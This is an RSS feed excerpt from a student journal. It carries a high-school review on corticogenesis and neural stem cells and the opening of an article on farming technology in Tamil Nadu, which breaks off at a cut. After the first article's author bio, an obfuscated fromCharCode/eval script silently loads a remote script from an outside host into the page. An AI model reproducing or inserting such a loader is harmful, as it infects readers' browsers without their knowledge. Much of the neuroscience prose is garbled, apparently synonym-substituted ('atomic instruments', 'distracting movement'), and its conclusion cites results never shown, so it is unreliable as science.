		<category><![CDATA[medicine]]></category>
		<category><![CDATA[Research]]></category>
		<category><![CDATA[stem cell therapy]]></category>
		<category><![CDATA[tissue reorganization]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1464</guid>

					<description><![CDATA[<p>Harsheel Dhruva<br />
Irvington High School</p>
<p>The post <a href="https://exploratiojournal.com/exploring-corticogenesis-pluripotent-stem-cells-into-cerebral-operations/">Exploring Corticogenesis: Pluripotent Stem Cells into Cerebral Operations</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Harsheel Dhruva</strong><br><strong>Mentor</strong>: Dr. Fabiola Munarin<br><em>Irvington High School </em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>The ability of stem cells to self-renew and form different mature cells expands the possibilities of application in cell therapy, such as tissue reorganization in regenerative medicine, drug detection, and treatment of neurodegenerative diseases. In addition to stem cells found in embryos, several adult organs and tissues also have stem cell niches in an undifferentiated state. In the central nervous system of adult mammals, neurogenesis occurs in two areas: the subventricular zone and the dentate gyrus of the hippocampus. The different nervous systems originate from adult neural stem cells, which can self-renew or differentiate into astrocytes, oligodendrocytes, or neurons that respond to specific stimuli. The regulation of the fate of neural stem cells is a finely controlled process that relies on a complex regulatory network that extends from the epigenetics to the translational level and involves components of the extracellular matrix. Therefore, a better understanding of the mechanisms by which neurogenesis is induced, regulated, and maintained will provide clues for the development of new strategies for neurodegenerative treatment. In this review, we focus on the regulatory mechanisms of transcription factors, microRNAs, and components of the extracellular matrix in neuronal differentiation.</p>



<h2 class="wp-block-heading">1. Introduction </h2>



<p>Neocortical circuits consist of profoundly interconnected excitatory glutamatergic and inhibitory GABAergic neurons, which are produced from unmistakable pools of RGCs. During embryo development, the excitatory neurons are formed from RGCs confined in the ventricular zone of the dorsal telencephalon and relocate radially toward the pial surface in a back to the front way (spiral movement). Then again, inhibitory neurons fundamentally begin from the ventral telencephalon and relocate digressively into the neocortex (distracting movement). Regardless of such unique formative starting points, both excitatory and inhibitory neurons go through the multipolar stage with a few minor cycles in the neocortex before axon augmentation. Then, at that point, they go through dynamic morphological changes to start axon development, in particular, neuronal polarization. Sakakibara and Hatanaka () assessed the consecutive occasions in polarization cycles of both excitatory and inhibitory neurons, and they talked about the hidden atomic instruments. At the multipolar stage, the excitatory neurons fleetingly utilize a multipolar relocation mode, to be specific movement with no fixed heading, in the subventricular and middle of the road zones. Then, at that point, they receive a bipolar shape during neuronal polarization and relocate rapidly toward the pial surface along with RGC measures, which is called headway mode.</p>



<p>Many types of molecules are involved in these powerful changes in neuron morphology and migration. The small GTP binding protein plays an important role in regulating the development of the cortex and the formation of neurons. The Rnd protein, &#8220;abnormal&#8221; relatives of Rho, was displayed in neuronal movement, and their ascending and descending pathways were discussed. Many cytoplasmic protein elements, including parts of the cytoskeleton, are managed through phosphorylation and dephosphorylation measures. Ohshima focused on protein kinases, including CDK5 and JNK, and examined their paperwork on cytoskeletal associations during multipolar bipolar progression and extended movement. OhtakaMaruyama and Okado comprehensively summarized the atomic pathways involved in these formation cycles and emphasized the importance of subplate neurons in steering events and the development of the six-layer neocortex design.&nbsp;</p>



<p>&nbsp;Pluripotent stem cells are usually derived from embryonic tissue. At least three different types of mammalian pluripotent stem cells have been identified: embryos or cancer cells (CE), embryonic stem cells (ES) derived from the inner cell mass of blastocysts, and embryonic germ cells (EG) derived from post-implantation embryos. In the early 1990s, several groups reported the existence of a subset of stem cells found in the central nervous system (CNS). These cells form the brains of fetal mice or mice that grow in culture and show an almost unlimited lifespan. However, compared to embryonic stem cells, their differentiation potential is more limited and they mainly produce three main cell types of the central nervous system: neurons, astrocytes, and oligodendrocytes, hence the name NSC. These cells have also been isolated from the adult central nervous system, although it is not clear whether these dividing cells are truly pluripotent or whether their fate becomes more restricted during development. For the purposes of this review, NSCs are defined as nerve cells that have the potential to self-renew and generate all the different types of cells in the nervous system after differentiation.&nbsp;</p>



<h2 class="wp-block-heading">2. Method</h2>



<p>Neuronal differentiation is an early event in mammalian embryogenesis, occurring shortly after germ layer differentiation. The organization of the central nervous system is derived from a well-defined neuroectoderm, the neural plate, which is located in the dorsal midline of the embryo. It appears that neural plaque is produced by signals that locally inhibit or avoid inducing non-neural differentiation. Examples of such signals come from bone morphogenetic protein (BMP) and other molecules of the transforming growth factor-beta (TGF beta) superfamily, which direct epidermal differentiation when gastrulation</p>



<p>Neuronal fate is inhibited by BMP. In the body, several molecules that promote neuronal differentiation, such as noggin, follistatin, and chordates, are antagonists of BMP. Although noggin antagonizes BMP signaling, it is not necessary for the induction of early neurogenesis, because knockout mice are normal at embryonic day 8.5 (although they die at birth). These data indicate that other BMP antagonists can compensate without Noggin expression and illustrate the concept of redundant signaling pathways during embryonic development. The role of BMP is further regulated by the presence of two ubiquitously expressed BMP receptors, BMPR1A and BMPR1B, which do not appear until the 9th day of the embryo. The expression of BMPR1A induces the expression of BMPR1B, and this process is inhibited by the sonic hedgehog. The further development of the neural lamina into mature cells of the central nervous system is clearly and precisely regulated by spatial and temporal differentiation patterns. The growth and proliferation of cells in the early neural plate eventually lead to the closure of the developing nerve sulcus and the formation of a hollow neural tube. The neural tube cavity produces the ventricular system and the epithelial layer contains stem cells that will produce neurons and glial cells of the central nervous system. One of the central problems in developmental neurobiology is the mechanism by which a simple neuroepithelium (only one cell thick) can produce the various cell types that make up the mammalian central nervous system. Currently, there is a large number of studies that have determined the internal factors and external soluble signals that affect this regional pattern and specific neural differentiation. An example of this invertebrate neurogenesis is the transmission of dorsal and ventral patterns of opposing soluble signals: sonic hedgehog (Shh) and BMP antagonists, chordin and noggin, are secreted from the bottom plate, while other signals are emitted from the top plate. Form a gradient. Signal concentration. The precise concentration and ratio of each signal in the neural tube is critical to the development of specific neuronal phenotypes at different points along the gradient. For example, there is a concentration-dependent induction of model genes in progenitor cells encoding homeodomain transcription factors. These differences in expression patterns produce neuronal clusters with different division and differentiation patterns (and ultimately different phenotypes) along the dorsal-ventral axis of the plaque. In humans, the neural tube is formed during the third and fourth weeks of pregnancy. Initially, the neuroepithelial lining consisted of a single layer of neural stem cells with similar morphology. These cells then divide symmetrically to enrich the pool of NSCs or divide asymmetrically to produce a more differentiated progeny from which neurons and mature cells of the glial mass line develop. Although the BMP family of molecules may be involved again, the signals that determine symmetric or asymmetric division are not yet fully understood.&nbsp;</p>



<p>Retroviral marker studies have been used to identify dividing cells in the ventricular region. Approximately 48% of the labeled cells remained in the colonies in the ventricular zone, indicating self-renewal at this site. In humans and other mammals, the active proliferation of such progenitor cells is likely to be balanced by apoptosis to maintain a stable population, but the exact mechanism has not been determined. As development continues, neurons migrate, partly guided by radially oriented glial processes, and the size of the ventricular area decreases. Neural stem cells are still attached to the basal layer. It has been shown that these cells can divide asymmetrically, and the more differentiated offspring migrate from the ventricular area to the overlying cortex. By obtaining specific phenotypic markers, these cells can divide further and distinguish them from neural stem cells. During CNS development, the temporal pattern causes oligodendrocytes to generate neuronal cell types earlier. In the spinal cord, these two cell populations appear to be produced from a common precursor, and the final decision of fate depends on external signals and specific patterns of transcriptional activation. There are two main types of transcription factors that can determine the fate of neurons or the glia. These are homeodomain factors, an example is NKx2.2, and the basic helix loop helix family of transcription factors, including Olig1 and Olig2. The expression of Olig transcription factors is regulated by external signals (such as Shh), and their expression has been shown to clearly define cells as oligodendrocytes. However, in mice, Olig1 and Olig2 are expressed from E9, long before the presence of oligodendrocyte precursors. At this early stage, Olig2 is known to be the core of neuronal development in specific areas of the ventral spinal cord and is found in cells that can track the fate of motor neurons. The importance of Olig2 in neurodevelopment has been demonstrated in functional gain experiments. As development proceeded, the expression of Olig1 and Olig2 persisted and began to overlap with the homeodomain transcription factor NKx2.2. These doubly positive progenitor cells migrate from the ventral midline and mature into oligodendrocytes. Olig1 and Olig2 have been developed in double-mutant mice. These animals lack oligodendrocytes and also have a considerable loss of motor neurons. In the Olig1 / Olig2 double mutant, the offspring of stem cells in the pMN region of the developing spinal cord generally develop into motor neurons, then oligodendrocytes, but form V2 interneurons and then astrocytes. These results indicate that the expression of the combination of transcription factors determines the fate of the stem cell bank in the developing embryo. However, this does not rule out the existence of more restrictive dividing cell populations. The expression of proglia transcription factors can be regulated by cell surface receptors such as gaps. The jagged1 (notched ligand) signal of neurons has been shown to inhibit the phenotype of oligodendrocytes. Presumably, when the number of neurons is sufficient, jagged1 is down-regulated, and a signal from the original oligodendrocytes (one of which may increase electrical activity) triggers myelination. Once the neural precursor determines the fate of the oligodendrocyte lineage, the last step of honey-forming cell formation needs to exist.</p>



<h2 class="wp-block-heading">3. Conclusion</h2>



<p>All in all, corticogenesis from mouse ESCs shows a setup collection of parent-of-beginning articulation and DNA methylation of engraved loci. This model could be utilized dependably to unwind the atomic components engaged with choosing the communicated parental allele with regard to engraving during the cortical turn of events. Our discoveries likewise give support to utilize ESCs to demonstrate cortical turn of events and for drug screening. The in vitro corticogenesis framework could be an integral asset to pinpoint sedates that de-curb the quieted parental allele in specific mind sicknesses related to irritated IG articulation or to gauge the effect of ecotoxic compounds on the epigenetic marks and the advancement of cortical cells. The cerebral cortex creates through the organized age of many neuronal subtypes, yet the systems included stay hazy. Here we show that mouse undeveloped undifferentiated organisms, refined with no morphogen except for within the sight of a sonic hedgehog inhibitor, summarize in vitro the significant achievements of cortical turn of events, prompting the successive age of a different collection of neurons that show the most notable elements of veritable cortical pyramidal neurons. When joined into the cerebral cortex, these neurons foster examples of axonal projections relating to a wide scope of cortical layers, yet in addition to exceptionally explicit cortical regions, specifically visual and limbic regions, subsequently showing that the character of a cortical region can be determined with no impact from the mind. The disclosure of natural corticogenesis reveals new insight into the instruments of neuronal particular and opens new roads for the demonstrating and treatment of neural disorder.</p>



<h2 class="wp-block-heading">Works Cited</h2>



<ol class="wp-block-list"><li>MuhChyi C, Juliandi B, Matsuda T, Nakashima K. Epigenetic regulation of neural stem cell fate during corticogenesis. Int J Dev Neurosci. 2013 Oct;31(6):424-33. doi: 10.1016/j.ijdevneu.2013.02.006. Epub 2013 Mar 4. PMID: 23466416.</li><li>Johnson CA, Wright CE, Ghashghaei HT. Regulation of cytokinesis during corticogenesis: focus on the midbody. FEBS Lett. 2017 Dec;591(24):4009-4026. doi: 10.1002/1873-3468.12676. Epub 2017 Aug 21. PMID: 28493553.</li><li>Tabata H. Diverse subtypes of astrocytes and their development during corticogenesis. Front Neurosci. 2015 Apr 7;9:114. doi: 10.3389/fnins.2015.00114. PMID: 25904839; PMCID: PMC4387540.</li><li>Pilaz LJ, Silver DL. Post-transcriptional regulation in corticogenesis: how RNA-binding proteins help build the brain. Wiley Interdiscip Rev RNA. 2015 Sep-Oct;6(5):501-15. doi: 10.1002/wrna.1289. Epub 2015 Jun 18. PMID: 26088328; PMCID: PMC4624281.</li><li>Agirman G, Broix L, Nguyen L. Cerebral cortex development: an outside-in perspective. FEBS Lett. 2017 Dec;591(24):3978-3992. doi: 10.1002/1873-3468.12924. Epub 2017 Dec 14. PMID: 29194577.</li><li>Varrault A, Journot L, Bouschet T. Cerebral Cortex Generated from Pluripotent Stem Cells to Model Corticogenesis and Rebuild Cortical Circuits: In Vitro Veritas? Stem Cells Dev. 2019 Mar 15;28(6):361-369. doi: 10.1089/scd.2018.0233. Epub 2019 Feb 20. PMID: 30661489.</li><li>Zhu X, Wu Y, Li C, Yan W, Pan J, Wang S, Zhao S. Prenatal Exposure to Gossypol Impairs Corticogenesis of Mouse. Front Neurosci. 2020 Apr 3;14:318. doi: 10.3389/fnins.2020.00318. PMID: 32317927; PMCID: PMC7146080.</li><li>Baum T, Gama V. Dynamic properties of mitochondria during human corticogenesis. Development. 2021 Feb 19;148(4):dev194183. doi: 10.1242/dev.194183. PMID: 33608250; PMCID: PMC7903999.</li><li>Lee CT, Bendriem RM, Wu WW, Shen RF. 3D brain Organoids derived from pluripotent stem cells: promising experimental models for brain development and neurodegenerative disorders. J Biomed Sci. 2017 Aug 20;24(1):59. doi: 10.1186/s12929-017-0362-8. PMID: 28822354; PMCID: PMC5563385.</li><li>Lancaster MA, Knoblich JA. Generation of cerebral organoids from human pluripotent stem cells. Nat Protoc. 2014 Oct;9(10):2329-40. doi: 10.1038/nprot.2014.158. Epub 2014 Sep 4. PMID: 25188634; PMCID: PMC4160653.</li><li>Paşca AM, Sloan SA, Clarke LE, Tian Y, Makinson CD, Huber N, Kim CH, Park JY, O&#8217;Rourke NA, Nguyen KD, Smith SJ, Huguenard JR, Geschwind DH, Barres BA, Paşca SP. Functional cortical neurons and astrocytes from human pluripotent stem cells in 3D culture. Nat Methods. 2015 Jul;12(7):671-8. doi: 10.1038/nmeth.3415. Epub 2015 May 25. PMID: 26005811; PMCID: PMC4489980.</li><li>Lancaster MA, Renner M, Martin CA, Wenzel D, Bicknell LS, Hurles ME, Homfray T, Penninger JM, Jackson AP, Knoblich JA. Cerebral organoids model human brain development and microcephaly. Nature. 2013 Sep 19;501(7467):373-9. doi: 10.1038/nature12517. Epub 2013 Aug 28. PMID: 23995685; PMCID: PMC3817409.</li><li>Tao Y, Zhang SC. Neural Subtype Specification from Human Pluripotent Stem Cells. Cell Stem Cell. 2016 Nov 3;19(5):573-586. doi: 10.1016/j.stem.2016.10.015. PMID: 27814479; PMCID: PMC5127287.</li><li>Mungenast AE, Siegert S, Tsai LH. Modeling Alzheimer&#8217;s disease with human induced pluripotent stem (iPS) cells. Mol Cell Neurosci. 2016 Jun;73:13-31. doi: 10.1016/j.mcn.2015.11.010. Epub 2015 Dec 4. PMID: 26657644; PMCID: PMC5930170.</li><li>Sances S, Bruijn LI, Chandran S, Eggan K, Ho R, Klim JR, Livesey MR, Lowry E, Macklis JD, Rushton D, Sadegh C, Sareen D, Wichterle H, Zhang SC, Svendsen CN. Modeling ALS with motor neurons derived from human induced pluripotent stem cells. Nat Neurosci. 2016 Apr;19(4):542-53. doi: 10.1038/nn.4273. PMID: 27021939; PMCID: PMC5015775.</li><li>Zhang H, Tian L, Shen M, Tu C, Wu H, Gu M, Paik DT, Wu JC. Generation of Quiescent Cardiac Fibroblasts From Human Induced Pluripotent Stem Cells for In Vitro Modeling of Cardiac Fibrosis. Circ Res. 2019 Aug 16;125(5):552-566. doi: 10.1161/CIRCRESAHA.119.315491. Epub 2019 Jul 10. PMID: 31288631; PMCID: PMC6768436.</li><li>Vijayakumar N, Op de Macks Z, Shirtcliff EA, Pfeifer JH. Puberty and the human brain: Insights into adolescent development. Neurosci Biobehav Rev. 2018 Sep;92:417-436. doi: 10.1016/j.neubiorev.2018.06.004. Epub 2018 Jul 1. PMID: 29972766; PMCID: PMC6234123.</li><li>Martinez-Morga M, Martinez S. Desarrollo y plasticidad del cerebro [Brain development and plasticity]. Rev Neurol. 2016;62 Suppl 1:S3-8. Spanish. PMID: 26922956.</li><li>Stiles J, Jernigan TL. The basics of brain development. Neuropsychol Rev. 2010 Dec;20(4):327-48. doi: 10.1007/s11065-010-9148-4. Epub 2010 Nov 3. PMID: 21042938; PMCID: PMC2989000.</li><li>Dubois J, Dehaene-Lambertz G, Kulikova S, Poupon C, Hüppi PS, Hertz-Pannier L. The early development of brain white matter: a review of imaging studies in fetuses, newborns and infants. Neuroscience. 2014 Sep 12;276:48-71. doi: 10.1016/j.neuroscience.2013.12.044. Epub 2013 Dec 28. PMID: 24378955.</li><li>Semple BD, Blomgren K, Gimlin K, Ferriero DM, Noble-Haeusslein LJ. Brain development in rodents and humans: Identifying benchmarks of maturation and vulnerability to injury across species. Prog Neurobiol. 2013 Jul-Aug;106-107:1-16. doi: 10.1016/j.pneurobio.2013.04.001. Epub 2013 Apr 11. PMID: 23583307; PMCID: PMC3737272.</li><li>Santocchi E, Guiducci L, Fulceri F, Billeci L, Buzzigoli E, Apicella F, Calderoni S, Grossi E, Morales MA, Muratori F. Gut to brain interaction in Autism Spectrum Disorders: a randomized controlled trial on the role of probiotics on clinical, biochemical and neurophysiological parameters. BMC Psychiatry. 2016 Jun 4;16:183. doi: 10.1186/s12888-016-0887-5. PMID: 27260271; PMCID: PMC4893248.</li><li>Lowe VJ, Wiste HJ, Senjem ML, Weigand SD, Therneau TM, Boeve BF, Josephs KA, Fang P, Pandey MK, Murray ME, Kantarci K, Jones DT, Vemuri P, Graff-Radford J, Schwarz CG, Machulda MM, Mielke MM, Roberts RO, Knopman DS, Petersen RC, Jack CR Jr. Widespread brain tau and its association with ageing, Braak stage and Alzheimer&#8217;s dementia. Brain. 2018 Jan 1;141(1):271-287. doi: 10.1093/brain/awx320. PMID: 29228201; PMCID: PMC5837250.</li><li>Smith AD, Smith SM, de Jager CA, Whitbread P, Johnston C, Agacinski G, Oulhaj A, Bradley KM, Jacoby R, Refsum H. Homocysteine-lowering by B vitamins slows the rate of accelerated brain atrophy in mild cognitive impairment: a randomized controlled trial. PLoS One. 2010 Sep 8;5(9):e12244. doi: 10.1371/journal.pone.0012244. PMID: 20838622; PMCID: PMC2935890.</li><li>Lin CH, Chiu SI, Chen TF, Jang JR, Chiu MJ. Classifications of Neurodegenerative Disorders Using a Multiplex Blood Biomarkers-Based Machine Learning Model. Int J Mol Sci. 2020 Sep 21;21(18):6914. doi: 10.3390/ijms21186914. PMID: 32967146; PMCID: PMC7555120.</li><li>Toma K, Hanashima C. Switching modes in corticogenesis: mechanisms of neuronal subtype transitions and integration in the cerebral cortex. Front Neurosci. 2015 Aug 11;9:274. doi: 10.3389/fnins.2015.00274. PMID: 26321900; PMCID: PMC4531338.</li><li>Aprea J, Calegari F. Long non-coding RNAs in corticogenesis: deciphering the non-coding code of the brain. EMBO J. 2015 Dec 2;34(23):2865-84. doi: 10.15252/embj.201592655. Epub 2015 Oct 29. PMID: 26516210; PMCID: PMC4687686.</li><li>Ishii K, Kubo KI, Nakajima K. Reelin and Neuropsychiatric Disorders. Front Cell Neurosci. 2016 Oct 18;10:229. doi: 10.3389/fncel.2016.00229. PMID: 27803648; PMCID: PMC5067484.</li><li>Subramanian L, Calcagnotto ME, Paredes MF. Cortical Malformations: Lessons in Human Brain Development. Front Cell Neurosci. 2020 Jan 24;13:576. doi: 10.3389/fncel.2019.00576. PMID: 32038172; PMCID: PMC6993122.</li><li>Trevino AE, Sinnott-Armstrong N, Andersen J, Yoon SJ, Huber N, Pritchard JK, Chang HY, Greenleaf WJ, Pașca SP. Chromatin accessibility dynamics in a model of human forebrain development. Science. 2020 Jan 24;367(6476):eaay1645. doi: 10.1126/science.aay1645. PMID: 31974223; PMCID: PMC7313757.</li></ol>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5> Harsheel Dhruva</h5><p>Harsheel is currently a Senior at Irvington High School in Fremont, California. Growing up in the Bay Area, he is very interested in the natural sciences and the potential of discovery from advancing technology. He is pursuing studies in Neuroscience and Biotechnology in hope of pioneering his own research in the future and create technology to improve the human condition. Outside of his study, Harsheel loves completing challenging physical activity or listening to music whenever he gets the chance, and is always happy to read something new. 
</p></figure></div>



<p></p>
<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/</script><p>The post <a href="https://exploratiojournal.com/exploring-corticogenesis-pluripotent-stem-cells-into-cerebral-operations/">Exploring Corticogenesis: Pluripotent Stem Cells into Cerebral Operations</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Technologies Reshaping Agriculture in Tamil Nadu, India</title>
		<link>https://exploratiojournal.com/technologies-reshaping-agriculture-in-tamil-nadu-india/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=technologies-reshaping-agriculture-in-tamil-nadu-india</link>
		
		<dc:creator><![CDATA[Harnishya Palanichamy]]></dc:creator>
		<pubDate>Tue, 23 Nov 2021 13:37:36 +0000</pubDate>
				<category><![CDATA[Biology]]></category>
		<category><![CDATA[Scientific]]></category>
		<category><![CDATA[agriculture]]></category>
		<category><![CDATA[biology]]></category>
		<category><![CDATA[Environmental Science]]></category>
		<category><![CDATA[farming]]></category>
		<category><![CDATA[Science]]></category>
		<category><![CDATA[technology]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1453</guid>

					<description><![CDATA[<p>Harnishya Palanichamy<br />
Episcopal Academy</p>
<p>The post <a href="https://exploratiojournal.com/technologies-reshaping-agriculture-in-tamil-nadu-india/">Technologies Reshaping Agriculture in Tamil Nadu, India</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="394" height="394" src="https://www.exploratiojournal.com/wp-content/uploads/2021/11/Harnishya-Palanichamy.jpeg" alt="" class="wp-image-1454 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2021/11/Harnishya-Palanichamy.jpeg 394w, https://exploratiojournal.com/wp-content/uploads/2021/11/Harnishya-Palanichamy-300x300.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2021/11/Harnishya-Palanichamy-150x150.jpeg 150w, https://exploratiojournal.com/wp-content/uploads/2021/11/Harnishya-Palanichamy-230x230.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2021/11/Harnishya-Palanichamy-350x350.jpeg 350w" sizes="(max-width: 394px) 100vw, 394px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Harnishya Palanichamy</strong><br><em>Hebron School,&nbsp;Lushington Campus<br></em></p>
</div></div>



<h2 class="wp-block-heading"><strong>Introduction </strong></h2>



<p>“If agriculture is to continue to feed the world, it needs to become more like manufacturing”, says Geoffrey Carrand fortunately, that is already beginning to happen.<strong><sup>1</sup></strong>Advances in technology are key to the future of agriculture as farmers strive to feed the world with limited natural resources.<strong><sup>2</sup></strong> In Tamil Nadu state, located in South India, Agriculture is the greatest overriding sector of the state’s economy and nearly 70% of states population is based on agriculture. The agriculture in Tamil Nadu has executed a good performance over the years with the help of efficient farmers who are both receptive and responsive to the technological development announced in the agricultural sector of the state.<strong><sup>3</sup></strong> Innovations for small agricultural operations can significantly increase profit margins by minimizing the need for manual labour with automation, expediting machinery commands with remote and real-time monitoring, and allowing farmers to utilize resources more efficiently with preventative maintenance and environmental prediction. Mass embracement of these technology advancements in agriculture will allow small land holding farmers to achieve higher potential for profit, and higher yields on the upfront investments.<strong><sup>4</sup></strong>I live in Tamil Nadu and our family own an agricultural field and that interests me to investigate this study, for which I researched and collected primary and secondary data regarding the topic.&nbsp; The technologies that are currently reshaping the agriculture of Tamil Nadu state are detailed below.</p>



<h2 class="wp-block-heading"><strong>PRECISION FARMING</strong></h2>



<p>Precision Farming helps farmers to generate data with the help of sensors and analyse that information to take intelligent and quick decisions.<strong><sup>5</sup></strong> It is the application of modern information technologies to provide, process and analyse multisource data of high spatial and temporal resolution for decision making and operations in the management of crop production<strong><sup>6&nbsp; </sup></strong>and helps in changing the socio-economic status of farmers.<strong><sup>7&nbsp;</sup></strong></p>



<h4 class="wp-block-heading"><strong>CASE STUDY</strong>&nbsp; &nbsp;</h4>



<p>Mr.Rajamani, a farmer in Coimbatore district, Tamil Nadu, follows the precision farming in his field, where he broadcasted the coriander seeds in between the turmeric crop, small onion and chilly as intercrops, red gram as border crop and irrigated the field through drip system. He harvested the coriander in 30 – 35 days, onion in 70 days, chillies on 90th day, red gram on 250th day and turmeric fingers on 275 days after sowing. He acquired yield of 7 tonnes of turmeric fingers and 13 tonnes of onion, 2 tonnes of green and dry chilies and 50 kg red gram in one hectare of land. He sold turmeric fingers at the rate of Rs. 135 / kg, onion at Rs. 20/ kg, chillies at Rs. 12/ kg, red gram at Rs. 100/ kg, tender coriander leaves Rs.4/kg and coriander seed at Rs. 15/ kg. He invested Rs. 3,35,400 for cultivation practices and attained a high profit of Rs. 9,66,000 per hectare and this was possible since he shifted from conventional farming to precision farming.<strong><sup>8</sup></strong></p>



<h2 class="wp-block-heading"><strong>ORGANIC FARMING</strong></h2>



<p>This process involves the use of biological materials, avoiding synthetic substances to maintain soil fertility and ecological balance thereby minimizing&nbsp;pollution&nbsp;and wastage. It relies on ecological processes, biodiversity and cycles adapted to local conditions, rather than the use of inputs with adverse effects and care for the larger environment and conservation of natural habitats and wildlife.<strong><sup>9</sup></strong></p>



<h4 class="wp-block-heading"><strong>CASE STUDY</strong></h4>



<p>Organic farming is the in-thing now in Thanjavur district, the rice bowl of Tamil Nadu, where one hundred farmers are successful in practising organic farming, for crops like- banana, maize and paddy. Mr.Kulandaisamy, a progressive farmer has raised Rasthali and Robust variety of bananas adopting organic farming methods. With respect to Rasthali, a bunch has five to six hands (hands means “seeppu” in Tamil language), instead of three to four hands, which are normally seen in ordinary cultivation and a single bunch weighs 20 kgs and fetches Rs.200. And the Robust variety of banana has 12 to 15 hands in a bunch and the bunch weighs 30 to 35 kgs, which are popularly sold in Tiruchirappalli city (my native), market. Fertiliser used by the farmer was composed using organic matters, neem, and pancha kavya prepared using cow&#8217;s urine and cow dung. The farmer has cultivated maize, paddy and Vanila (a profit-oriented venture), using organic farming.<strong><sup>10</sup></strong></p>



<h2 class="wp-block-heading"><strong>DRONES&nbsp;</strong></h2>



<p>&nbsp;Drones help farmers optimize the use of inputs such as seeds, fertilizers, water, and pesticides more efficiently. This allows timely protection of crops from pests, saves time for crop scouting, reduces overall cost in farm production, and secures high yield, increasing the farm profitability.<strong><sup> 11</sup></strong>Initially used for chemical spraying, today drones are a great tool used to assess different aspects of plant health, weeds, and assets.</p>



<h4 class="wp-block-heading"><strong>CASE STUDY</strong></h4>



<p>Tamil Nadu Agricultural University has developed drones, that could carry 15kg agricultural input, that helps to spray pesticides, insecticides and herbicides to protect crops, with a capability of covering one hectare in five minutes and a maximum of three hectares in 15 minutes in a single flight. It could cover large areas in a short time, so that pests could be destroyed across massive tracts of land before they could spread. However, drifting due to varying wind speed is a risk. During windy days it may not be a good choice, says the officials.<strong><sup> 12</sup></strong> And in future, usage of a drone would eliminate dependence on the already scarce farm labour.&nbsp;</p>



<h2 class="wp-block-heading"><strong>IOT BASED SMART FARMING</strong></h2>



<p>In IoT-based smart farming, a system is built for monitoring the crop field with the help of sensors and automating the irrigation system. The farmers can monitor the field conditions from anywhere.In terms of environmental issues, IoT-based smart farming can provide great benefits including more efficient water usage, or optimization of inputs and treatments.<strong><sup> 13</sup></strong></p>



<h4 class="wp-block-heading"><strong>CASE STUDY</strong></h4>



<p>A team of college students from Salem city, Tamil Nadu, have come into the spotlight recently for their Internet-of-Things (IoT) based software solution that seeks to give a push to smart farming, and this crop guidance software is a set of three applications that enable remote monitoring of pest control, automated watering and growth. The objective is to bring in smart farming solutions that allow farmers to produce maximum yields with minimum resources such as water, fertiliser and seeds, and reduce wastage or losses. One of the applications of their IoT-based comprehensive solution is the Plant Growth Monitoring System, which uses colour sensors to check the growth of the plants and sprays fertiliser as and when needed. Another application with an additional WiFi module identifies pest attacks and sprays pesticide precisely on the affected parts of the agricultural land. Another application, the Automatic Plant Watering System, uses a moisture sensor and utilises water resource judiciously as it triggers watering based on the moisture level of the soil. The systems work automatically- for example- in the watering system when the sufficient water level is reached, it will switch off on its own. This makes it easier for farmers and makes the process seamless. As the applications are IoT-based, they also have a feature that provides weather conditions for proper crop growth to the farmers. <strong><sup>14</sup></strong></p>



<h2 class="wp-block-heading"><strong>MOBILE APPS&nbsp;</strong></h2>



